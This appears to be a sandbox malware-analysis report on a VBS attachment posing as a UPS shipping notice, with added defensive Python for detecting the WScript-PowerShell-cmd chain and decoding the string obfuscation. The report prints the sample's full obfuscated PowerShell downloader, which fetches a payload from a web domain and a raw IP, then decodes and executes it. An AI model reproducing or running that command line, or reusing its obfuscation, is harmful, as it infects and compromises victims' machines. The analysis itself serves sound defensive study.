Analysis
max time kernel: 131s
max time network: 142s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 27-06-2024 07:00
Static task: static1
Behavioral task: behavioral1
  Sample: ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
  Resource: win10v2004-20240611-en
General
Target: ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
Size: 187KB (the "(991KB)" in the filename does not match the actual file size)
MD5: a408481803f47324f6479a3b70ad763b
SHA1: 1a3232aeec010ce287ea65dd1a24255f95470d48
SHA256: 4573cff18a16eacc05034a4de1e11330c71331b15169d4249e8b04f3ab67c2bf
SHA512: aab87aee34a0c93381fb0fb926edc137ffced40bba470b15dd45b798aeab9117f5a4daf30932dccef13c5c898d80f626e18a1a65d8c10b2c111319bb781f341e
SSDEEP: 3072:dmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZg:d08GxbKja3+DCbKCvBB/WnHXC/sLJFJN
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
  flow  pid   process
  8     2668  powershell.exe
  10    2668  powershell.exe
  12    2668  powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   process
  2668  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   process
  Token: SeDebugPrivilege  2668  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   process         target process
  PID 1720 wrote to memory of 2668  1720  WScript.exe     powershell.exe
  PID 1720 wrote to memory of 2668  1720  WScript.exe     powershell.exe
  PID 1720 wrote to memory of 2668  1720  WScript.exe     powershell.exe
  PID 2668 wrote to memory of 2324  2668  powershell.exe  cmd.exe
  PID 2668 wrote to memory of 2324  2668  powershell.exe  cmd.exe
  PID 2668 wrote to memory of 2324  2668  powershell.exe  cmd.exe
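The WriteProcessMemory rows above are the parent-child handoffs of the tree this sample builds: WScript.exe (1720) starts powershell.exe (2668), which starts cmd.exe (2324). A detection that keys on that chain rather than on any one image name is what a SOC would want to carry away from this report. The Python below is an added example, not part of the sandbox output; its events are constructed to mirror the report's PIDs and images in the shape of Sysmon Event ID 1 fields (the long PowerShell command line is replaced by a same-length stand-in), and the 2000-character threshold is an assumed tuning value.

```python
"""Parent-chain detection for the process tree in this report:
Windows Script Host -> powershell.exe -> cmd.exe.

Added example; the events are constructed, not taken from the sandbox log.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumed threshold: the report's powershell.exe command line runs to several
# thousand characters of filler and encoded literals; 2000 is a tuning choice.
LONG_CMDLINE = 2000


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def image_name(path: str) -> str:
    """Case-folded basename: C:\\Windows\\System32\\WScript.exe -> wscript.exe."""
    return ntpath.basename(path).lower()


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image names from the process itself up through its recorded ancestors.
    Stops at a PID with no event (parent not logged) or on a cycle, which PID
    reuse can produce when a stale parent points back down the chain."""
    chain: List[str] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(image_name(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule_name) findings for the chain conditions."""
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[int, str]] = []
    for e in events:
        chain = ancestry(e.pid, by_pid)  # [self, parent, grandparent, ...]
        me = chain[0]
        parent = chain[1] if len(chain) > 1 else ""
        grandparent = chain[2] if len(chain) > 2 else ""
        if me in SHELLS and parent in SCRIPT_HOSTS:
            findings.append((e.pid, "script_host_spawned_powershell"))
            if len(e.cmdline) > LONG_CMDLINE:
                findings.append((e.pid, "oversized_powershell_cmdline"))
        if me == "cmd.exe" and parent in SHELLS and grandparent in SCRIPT_HOSTS:
            findings.append((e.pid, "cmd_from_powershell_from_script_host"))
    return findings


# Constructed events modelled on the report's tree, plus one benign PowerShell
# launched from explorer.exe that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1720, 1000, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp'
              r'\ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs"'),
    ProcEvent(2668, 1720, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe \"cls;write '" + "A" * 2500 + "';...\""),  # stand-in for the real line
    ProcEvent(2324, 2668, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Repset.Kbm && echo t"'),
    ProcEvent(3100, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command Get-Date"),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

The benign explorer.exe-launched PowerShell produces no finding; the three findings land on 2668 and 2324 only. In a real pipeline the same walk runs over Sysmon or EDR process-creation events keyed by ProcessGuid rather than PID, since PIDs are reused.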
Processes
1. C:\Windows\System32\WScript.exe
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3 Alcoa Restauranterne Evnesvag Cistophoric Frisvmmere Baroscopic151 Colaers Maney Lyngbyaceae Overripen224 Fuldtidsjob Tjenestemndenes Rowet Skolealderens188 Slouchily emulsible Bghjortenes Tabescence Brandtomts Pelotas Branchial Forbisetes salamis Predamaged3';$Betnkelighederne = 1;Function Fellatrices($Trucing){$Farcically232=$Trucing.Length-$Betnkelighederne;$Leukocytotic64='SUBSTRIN';$Leukocytotic64+='G';For( $gracileness=1;$gracileness -lt $Farcically232;$gracileness+=2){$Alcoa+=$Trucing.$Leukocytotic64.Invoke( $gracileness, $Betnkelighederne);}$Alcoa;}function Interalar47($Weather){ . ($Terrnlbets253) ($Weather);}$talesituationens=Fellatrices ' MFo zsiKl.lNa / 5..D0. H( WSilnNd.o w sI NDT .1 0F. 0H;N TW.iTn 6h4R; Sx.6L4.;C RrAv :S1i2M1S.C0S)R BGAeTc k oA/ 2.0D1R0 0.1Y0,1 ,F iCrDeRfFo xL/H1f2S1T. 0E ';$Stilkunstnernes=Fellatrices 'FUUsleOrU-HATgTe n t ';$Frisvmmere=Fellatrices '.h,tit.pBs :./K/le.vCoTlEu xPc.o nSt.a baiFl i dnaVd.eO. c o mR.Kb.rC/pbLr,/,K osn kBuDrKr eTnTc,eCe vNn.eFn,.Fd wKpK> hWtNtIpR:B/ / 9 4v..1 5B6 . 7G9...2D1s1P/ K.oFn kCuUrBr eTnOcTe,eRvvn ePn .Od wUp ';$Constantia228=Fellatrices 'E>R ';$Terrnlbets253=Fellatrices 'TiSe xR ';$Yearock='Maney';$Smittle = Fellatrices ' eAcNh o, V%.a p pCdSa t,aw% \,RDe p,s e,tB.BKAb m. C&,&. ,ePcNhNo, At ';Interalar47 (Fellatrices 'P$UgMlPoRb aIlB:SL iPbPeBlElAi,sNts=.(ScAmId, S/ cL P$ S.m iPt tPl,e )A ');Interalar47 (Fellatrices ' $ g l oFb.a.l.:,CmiSsTt o pVh,ohr.iTc =.$ F,r.iUs.vVm mFeDrTeF. sMpsl i t,(B$ICto nVsTtAaRn tKina.2 2 8,) ');Interalar47 (Fellatrices 'p[VN e.t.. SSeKr,v iTckeSPFoOiCnSt MSaFn.a gdeSr ],:F: SAeCcIuIr.iEt ySP rLoTtEo cTo lT .=F K[ N,eUti.,SAe,c u r i tAyRPKr o t o,c opl TAy pue ]U:W: Tal s 1,2 ');$Frisvmmere=$Cistophoric[0];$Snidely= (Fellatrices ' $DgKl,o,bBa.lP: pTr.oVpNeMl lNeSrCsC=.NBeBw.-BOUb jIeGc t, SAy s tAeFm..DNEe tH.AWPePb,CLl iTe n t');$Snidely+=$Libellist[1];Interalar47 ($Snidely);Interalar47 (Fellatrices 'H$SpCrToEpde lElDeSrLsR.TH e a d eVr sB[k$ S.tUi lNk.uFnUsNt nAeNr nbeHs ],= $EtPa lKe sFiStTuSaBtBi o n eAn s ');$Hotheartedness=Fellatrices 'C$ pDr,oDpeeSlClPe,r s.. D o.w n,lSo aPdFFBiFlAeH( $UFUr.i sVvMm m eprSeE, $LFUo rSb iFs,e t,e s.)L ';$Forbisetes=$Libellist[0];Interalar47 (Fellatrices 'F$Kg lSoSb a l : I,n dVu,s.tOrBiPm.i nsi sstBrCe.nBeDs,=U(PTNe.sWt - PAaItSh. S$ F oPrObSi,s.e t.e sI). ');while (!$Industriministrenes) {Interalar47 (Fellatrices '.$ g lPo.b aMl,: b,aFgFtSa laeMr =S$GtArSu.e ') ;Interalar47 $Hotheartedness;Interalar47 (Fellatrices ' Smt.a rMtC- S lLeZeDps 4R ');Interalar47 (Fellatrices ' $ gEl o,bNaBl :PIsn d,u sVtUr i m iRn i s t r ecnEe sD= (,TRe sPtA-LPLa t h $ F oBrUbLi,s,e t,e sS)r ') ;Interalar47 (Fellatrices ' $DgNlCo bDaOlR:RE v n.e sAv.aBgv=,$ g,l,oBb,aIla:.RFegs t.aKu rSa nPtTe,rKnSe.+G+ % $EC,i swtKoUpchGo.rSiscS.NcNo,uLnLt, ') ;$Frisvmmere=$Cistophoric[$Evnesvag];}$Knallertfreren=362845;$tolkningsrammerne=26102;Interalar47 (Fellatrices 'P$,gOlCo bNa.lH: Ldy.nDgDb y,a c e a.e, U= NGRe tl-SCEoTn t.e n t. D$ FIo r bLiEs eAt e s ');Interalar47 (Fellatrices ' $Tgwl,o,bBaSl : P.e,lEoOrKi,aKn T= [RSTy sPt,ePmS. C.oSn,vIe.rSt ].:R:.F r o.mGBVa sFeC6 4 S tVrNiBn gI(A$ILAyHnVgIb y a c eCaHe ). ');Interalar47 (Fellatrices 'F$Mg l oPbOa,lO:CT j eMnTeLsAtAeWm nBd eFn eLs, =S .[RSGy.s t eemK.MT eKx.t . E,nScOo.d.i nMg,],:A:LADSRCAIUIB. G eSt S,tPrFiIn g,(a$,Pse,l oCrFiMaSn )B ');Interalar47 (Fellatrices 'M$FgSl.oSb a.l :PF o rHdBr.iAnPgNsBh a,v.e.r.eC1,8K0.= $CT.j.ePn.eSs tDeSmVn d e nUeBs .psFu bSsFt,r iAn,gB( $,K,n.aFlIl.eAr.t f,rOe.r,e n ,,$VtEoOl,kGnGiun g sBr aIm.mBe,rAn e.) ');Interalar47 $Fordringshavere180;"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\cmd.exe
         "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Repset.Kbm && echo t"
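The PowerShell stage above hides every literal behind one decoder function, Fellatrices: with $Betnkelighederne set to 1 it walks the string at offsets 1, 3, 5, ... while the offset stays below Length - 1 and concatenates Substring(offset, 1), so payload characters sit at odd offsets and every even offset is junk. Interalar47 dot-sources whatever Fellatrices 'TiSe xR ' decodes to, which is iex, so each Interalar47 (Fellatrices '...') call is an execute-this-decoded-string step, and the two plaintext constants near the end of the line (362845 and 26102) are passed to a decoded .substring() call before the final Interalar47. The cmd.exe child exists to resolve %appdata%\Repset.Kbm and to echo the single character t that the script appends to a decoded string ($Snidely += $Libellist[1]) before executing it. The Python below is an added example, not code from the report or from the sample: it mirrors the decoder, adds an encoder for constructed test data, and pulls every Fellatrices '...' literal out of a command-line blob. The three literals it ships with are copied from the command line above; the longer literals on this page do not all decode cleanly, because the rendered report collapsed runs of spaces and a collapse of an even-length run shifts parity for the rest of the string, which is what the parity_candidates helper is for.

```python
"""Decoder for the every-other-character string obfuscation used by the
PowerShell stage in the process tree (the script's own Fellatrices function).

Added example for this report; not code from the sample or the sandbox.
"""
import re
from itertools import cycle
from typing import List, Tuple


def fellatrices(s: str) -> str:
    """Exact mirror of the script's loop: with $Betnkelighederne = 1 it keeps
    Substring(i, 1) for i = 1, 3, 5, ... while i < Length - 1."""
    out = []
    i = 1
    while i < len(s) - 1:
        out.append(s[i])
        i += 2
    return "".join(out)


def parity_candidates(s: str) -> Tuple[str, str]:
    """Both de-interleavings (odd offsets, even offsets). When a rendered
    report has collapsed a run of spaces by an odd number of characters, the
    readable text jumps from one candidate to the other at that point."""
    return s[1::2], s[0::2]


def encode(plain: str, junk: str = "KlXpRq") -> str:
    """Re-create the scheme for constructed test data: junk, char, junk, char,
    ..., junk. Length is 2n + 1, so the decoder's i < Length - 1 bound still
    reaches the last payload character."""
    j = cycle(junk)
    out = []
    for c in plain:
        out.append(next(j))
        out.append(c)
    out.append(next(j))
    return "".join(out)


def collapse_spaces(s: str) -> str:
    """Simulate what an HTML renderer does to runs of spaces."""
    return re.sub(r" {2,}", " ", s)


# Call sites look like: Fellatrices '<literal>'  (the literals contain no quotes)
CALL_RE = re.compile(r"Fellatrices\s+'([^']*)'")


def decode_calls(ps: str) -> List[str]:
    """Decode every Fellatrices '...' literal in a PowerShell blob, in order."""
    return [fellatrices(m.group(1)) for m in CALL_RE.finditer(ps)]


# Three short literals copied verbatim from the powershell.exe command line in
# the report. They contain no adjacent spaces, so they survived rendering.
REPORT_LITERALS = (
    "$Terrnlbets253=Fellatrices 'TiSe xR ';"
    "$Stilkunstnernes=Fellatrices 'FUUsleOrU-HATgTe n t ';"
    "$Constantia228=Fellatrices 'E>R ';"
)

# Constructed literal: "Windows NT" encoded with X junk, except that the junk
# character before the payload space is itself a space, giving a two-space run.
DAMAGED_LITERAL = "XWXiXnXdXoXwXs  XNXTX"

if __name__ == "__main__":
    print(decode_calls(REPORT_LITERALS))
    print(fellatrices(encode("New-Object System.Net.WebClient")))
    # Intact, the constructed literal decodes; after the renderer collapses the
    # two-space run to one, the tail of the text moves to the other parity.
    print(fellatrices(DAMAGED_LITERAL))
    print(parity_candidates(collapse_spaces(DAMAGED_LITERAL)))
```

decode_calls on the three report literals gives iex, User-Agent and >, matching their roles in the script: the executor name that Interalar47 dot-sources, the header set on the downloader object, and the separator on which the URL list is split. For the long literals, take the command line from the sandbox's raw process record or from the .vbs itself rather than from the rendered page, since any whitespace normalisation silently breaks the parity the decoder depends on.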
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads (memory dumps of powershell.exe, PID 2668)
- memory/2668-11-0x000007FEF588E000-0x000007FEF588F000-memory.dmp  (4KB)
- memory/2668-12-0x000000001B5F0000-0x000000001B8D2000-memory.dmp  (2.9MB)
- memory/2668-13-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp  (9.6MB)
- memory/2668-14-0x0000000001CA0000-0x0000000001CA8000-memory.dmp  (32KB)
- memory/2668-15-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp  (9.6MB)
- memory/2668-16-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp  (9.6MB)
- memory/2668-17-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp  (9.6MB)
- memory/2668-18-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp  (9.6MB)
- memory/2668-19-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp  (9.6MB)
- memory/2668-20-0x000007FEF588E000-0x000007FEF588F000-memory.dmp  (4KB)
- memory/2668-21-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp  (9.6MB)
- memory/2668-22-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp  (9.6MB)